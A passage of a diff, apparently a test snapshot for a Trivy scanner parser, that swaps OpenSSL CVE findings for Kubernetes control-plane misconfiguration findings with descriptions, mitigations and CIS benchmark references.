/etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144012", + "value": "https://avd.aquasec.com/misconfig/kcv0018", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144015", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0019", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0019", + ], + }, + "category": "Misconfiguration", + "description": "Enable auditing on the Kubernetes API Server and set the desired audit log path.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-path parameter.", + "name": "Ensure that the --audit-log-path argument is set(Ensure that the --audit-log-path argument is set)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144017", + "value": "https://avd.aquasec.com/misconfig/kcv0019", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2144019", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0020", + ], + }, + "category": "Misconfiguration", + "description": "Retain the logs for at least 30 days or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxage parameter to 30 or as an appropriate number of days.", + "name": "Ensure that the --audit-log-maxage argument is set to 30 or as appropriate(Ensure that the --audit-log-maxage argument is set to 30 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2145170", + "value": "https://avd.aquasec.com/misconfig/kcv0020", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2158412", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0021", + ], + }, + "category": "Misconfiguration", + "description": "Retain 10 or an appropriate number of old log files.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxbackup parameter to 10 or to an appropriate value.", + "name": "Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate(Ensure that the --audit-log-maxbackup argument is set to 10 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164440", + "value": "https://avd.aquasec.com/misconfig/kcv0021", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164487", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0022", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0022", + ], + }, + "category": "Misconfiguration", + "description": "Rotate log files on reaching 100 MB or as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Edit the API server pod specification file /etc/kubernetes/manifests/kube-apiserver.yaml on the Control Plane node and set the --audit-log-maxsize parameter to an appropriate size in MB", + "name": "Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate(Ensure that the --audit-log-maxsize argument is set to 100 or as appropriate)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164488", + "value": "https://avd.aquasec.com/misconfig/kcv0022", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164492", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", + ], + }, + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164494", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164497", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164499", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2164500", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4203", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4304", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-4450", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0215", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0216", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0217", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV014", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", + "https://avd.aquasec.com/misconfig/ksv014", + ], + }, + "category": "Misconfiguration", + "description": "An immutable root file system prevents applications from writing to their local disk. This can limit intrusions, as attackers will not be able to tamper with the file system or write foreign executables to disk.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Change 'containers[].securityContext.readOnlyRootFilesystem' to 'true'.", + "name": "Root file system is not read-only(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.readOnlyRootFilesystem' to true)", + "references": [ { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/ksv014", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0401", + "value": "https://kubesec.io/basics/containers-securitycontext-readonlyrootfilesystem-true/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV016", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv016", + ], + }, + "category": "Misconfiguration", + "description": "When containers have memory requests specified, the scheduler can make better decisions about which nodes to place pods on, and how to deal with resource contention.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].resources.requests.memory'.", + "name": "Memory requests not specified(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.requests.memory')", + "references": [ { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2165.html", + "value": "https://avd.aquasec.com/misconfig/ksv016", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2023:0946", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV018", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-resources-limits-memory/", + "https://avd.aquasec.com/misconfig/ksv018", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing memory limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.memory'.", + "name": "Memory not limited(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'resources.limits.memory')", + "references": [ { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/LibreSSL/libressl-3.6.2-relnotes.txt", + "value": "https://avd.aquasec.com/misconfig/ksv018", }, { "type": "URL", - "value": "https://ftp.openbsd.org/pub/OpenBSD/patches/7.2/common/018_x509.patch.sig", + "value": "https://kubesec.io/basics/containers-resources-limits-memory/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV020", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv020", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with user ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsUser' to an integer > 10000.", + "name": "Runs with low user ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsUser' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2c6c9d439b484e1ba9830d8454a34fa4f80fdfe9", + "value": "https://avd.aquasec.com/misconfig/ksv020", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2f7530077e0ef79d98718138716bc51ca0cad658", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV021", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-runasuser/", + "https://avd.aquasec.com/misconfig/ksv021", + ], + }, + "category": "Misconfiguration", + "description": "Force the container to run with group ID > 10000 to avoid conflicts with the host’s user table.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsGroup' to an integer > 10000.", + "name": "Runs with low group ID(Container 'kube-apiserver' of Pod 'kube-apiserver-kind-control-plane' should set 'securityContext.runAsGroup' > 10000)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fd2af07dc083a350c959147097003a14a5e8ac4d", + "value": "https://avd.aquasec.com/misconfig/ksv021", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://kubesec.io/basics/containers-securitycontext-runasuser/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV023", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv023", + ], + }, + "category": "Misconfiguration", + "description": "HostPath volumes must be forbidden.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Do not set 'spec.volumes[*].hostPath'.", + "name": "hostPath volumes mounted(Pod 'kube-apiserver-kind-control-plane' should not set 'spec.template.volumes.hostPath')", + "references": [ { "type": "URL", - "value": "https://github.com/pyca/cryptography/security/advisories/GHSA-x4qr-2fvf-3mr5", + "value": "https://avd.aquasec.com/misconfig/ksv023", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0286.html", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-apiserver-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV106", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv106", + ], + }, + "category": "Misconfiguration", + "description": "Containers must drop ALL capabilities, and are only permitted to add back the NET_BIND_SERVICE capability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-apiserver-kind-control-plane", + "mitigation": "Set 'spec.containers[*].securityContext.capabilities.drop' to 'ALL' and only add 'NET_BIND_SERVICE' to 'spec.containers[*].securityContext.capabilities.add'.", + "name": "Container capabilities must only include NET_BIND_SERVICE(container should drop all)", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2932.html", + "value": "https://avd.aquasec.com/misconfig/ksv106", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-0286", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0033", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0033", + ], + }, + "category": "Misconfiguration", + "description": "Activate garbage collector on pod termination, as appropriate.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --terminated-pod-gc-threshold to an appropriate threshold.", + "name": "Ensure that the --terminated-pod-gc-threshold argument is set as appropriate(Ensure that the --terminated-pod-gc-threshold argument is set as appropriate)", + "references": [ { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2023-0006.html", + "value": "https://avd.aquasec.com/misconfig/kcv0033", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5844-1", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0034", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0034", + ], + }, + "category": "Misconfiguration", + "description": "Disable profiling, if not needed.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the below parameter.", + "name": "Ensure that the --profiling argument is set to false(Ensure that the --profiling argument is set to false)", + "references": [ { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-1", + "value": "https://avd.aquasec.com/misconfig/kcv0034", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5845-2", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KCV0038", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://www.cisecurity.org/benchmark/kubernetes", + "https://avd.aquasec.com/misconfig/kcv0038", + ], + }, + "category": "Misconfiguration", + "description": "Enable kubelet server certificate rotation on controller-manager.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Edit the Controller Manager pod specification file /etc/kubernetes/manifests/kube-controller-manager.yaml on the Control Plane node and set the --feature-gates parameter to include RotateKubeletServerCertificate=true .", + "name": "Ensure that the RotateKubeletServerCertificate argument is set to true(Ensure that the RotateKubeletServerCertificate argument is set to true)", + "references": [ { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2023-0286", + "value": "https://avd.aquasec.com/misconfig/kcv0038", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20230207.txt", + "value": "https://www.cisecurity.org/benchmark/kubernetes", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1n-0+deb11u5", - "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", - "id": "CVE-2023-0464", - "installedVersion": "1.1.1n-0+deb11u3", - "packageName": "libssl1.1", + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV001", + "installedVersion": undefined, + "packageName": undefined, "references": [ - "https://access.redhat.com/security/cve/CVE-2023-0464", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", - "https://linux.oracle.com/cve/CVE-2023-0464.html", - "https://linux.oracle.com/errata/ELSA-2023-3722.html", - "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", - "https://nvd.nist.gov/vuln/detail/CVE-2023-0464", - "https://ubuntu.com/security/notices/USN-6039-1", - "https://www.cve.org/CVERecord?id=CVE-2023-0464", - "https://www.debian.org/security/2023/dsa-5417", - "https://www.openssl.org/news/secadv/20230322.txt", + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv001", ], }, - "category": "Vulnerability", - "description": "A security vulnerability has been identified in all supported versions - -of OpenSSL related to the verification of X.509 certificate chains -that include policy constraints. Attackers may be able to exploit this -vulnerability by creating a malicious certificate chain that triggers -exponential use of computational resources, leading to a denial-of-service -(DoS) attack on affected systems. - -Policy processing is disabled by default but can be enabled by passing -the \`-policy' argument to the command line utilities or by calling the -\`X509_VERIFY_PARAM_set1_policies()' function.", - "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", - "mitigation": undefined, - "name": "Denial of service by excessive resource usage in verifying X509 policy constraints", + "category": "Misconfiguration", + "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", + "name": "Process can elevate its own privileges(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.allowPrivilegeEscalation' to false)", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2023-0464", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2023-0464", + "value": "https://avd.aquasec.com/misconfig/ksv001", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0464", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", }, + ], + "severity": "MEDIUM", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV003", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "https://avd.aquasec.com/misconfig/ksv003", + ], + }, + "category": "Misconfiguration", + "description": "The container should drop all default capabilities and add only those that are needed for its execution.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", + "name": "Default capabilities not dropped(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should add 'ALL' to 'securityContext.capabilities.drop')", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2017771e2db3e2b96f89bbe8766c3209f6a99545", + "value": "https://avd.aquasec.com/misconfig/ksv003", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=2dcd4f1e3115f38cefa43e3efbe9b801c27e642e", + "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV009", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", + "https://avd.aquasec.com/misconfig/ksv009", + ], + }, + "category": "Misconfiguration", + "description": "Sharing the host’s network namespace permits processes in the pod to communicate with processes bound to the host’s loopback adapter.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Do not set 'spec.template.spec.hostNetwork' to true.", + "name": "Access to host network(Pod 'kube-controller-manager-kind-control-plane' should not set 'spec.template.spec.hostNetwork' to true)", + "references": [ { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=879f7080d7e141f415c79eaa3a8ac4a3dad0348b", + "value": "https://avd.aquasec.com/misconfig/ksv009", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=959c59c7a0164117e7f8366466a32bb1f8d77ff1", + "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#baseline", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV011", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", + "https://avd.aquasec.com/misconfig/ksv011", + ], + }, + "category": "Misconfiguration", + "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", + "name": "CPU not limited(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'resources.limits.cpu')", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2023-0464.html", + "value": "https://avd.aquasec.com/misconfig/ksv011", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-3722.html", + "value": "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'Pod/kube-controller-manager-kind-control-plane' / Class: 'config' / Type: 'kubernetes'", + "id": "KSV012", + "installedVersion": undefined, + "packageName": undefined, + "references": [ + "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "https://avd.aquasec.com/misconfig/ksv012", + ], + }, + "category": "Misconfiguration", + "description": "'runAsNonRoot' forces the running image to run as a non-root user to ensure least privileges.", + "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=kube-controller-manager-kind-control-plane", + "mitigation": "Set 'containers[].securityContext.runAsNonRoot' to true.", + "name": "Runs as root user(Container 'kube-controller-manager' of Pod 'kube-controller-manager-kind-control-plane' should set 'securityContext.runAsNonRoot' to true)", + "references": [ { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2023/06/msg00011.html", + "value": "https://avd.aquasec.com/misconfig/ksv012", }, { "type": "URL", - "value": 